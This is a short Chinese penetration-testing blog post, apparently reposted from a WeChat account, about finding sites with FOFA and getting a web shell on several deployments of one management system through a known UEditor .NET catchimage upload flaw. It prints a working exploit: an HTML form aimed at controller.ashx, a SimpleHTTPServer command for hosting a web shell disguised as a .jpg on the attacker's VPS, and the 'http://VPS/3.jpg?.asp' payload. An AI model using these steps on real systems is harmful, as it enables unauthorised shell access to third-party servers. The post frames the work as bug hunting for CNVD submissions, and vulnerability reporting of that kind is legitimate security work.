1、起因:
摸鱼莫得好好的 领导让挖点cnvd
垃圾水文 轻喷!!
打开fofa 随便找几个用户量差不多的系统:直接搜:xx管理系统,为什么这样搜,因为直接搜“管理系统”有点多,不好选,(这个xx我一般搜某个行业)
随机挑选一名幸运观众
就它了:
系统长这样
试了几个弱口令 无果!
跑一遍目录:
跑出来几个目录列表漏洞:
目录列表这个漏洞,说大也不大,说小也不小,但是这个长这样感觉挺严重的。
也算是意料之中:不可能把网站搞得这么弱智,这种情况要么是404,要么是401、403,要么就是开发有点问题!!!
接下来就是无聊的翻文件环节,看看有什么未授权的接口
翻的我眼都酸了,直到在Js文件夹里面找到了希望——ueditor
接下来是简单的复现ueditor历史漏洞
长这个样子的一般就是存在漏洞的:
将下面的代码保存为html:
<form action="http://target/content/Js/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit" /></form>
把你的马改成jpg后缀放到你的VPS上
开启http服务:python2 -m SimpleHTTPServer 7788
在刚才打开的html上输入payload:http://VPS/3.jpg?.asp
提交后会返回文件路径:
随便有试了几个确定是小通杀:
理想很美好,查了一下该公司信息,资本不够5千,不知道能不能收,不知道有没有被提过。
总结:搞渗透还是得细心,耐心
原文始发于微信公众号(99Sec):记一次简单小通杀getshell
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论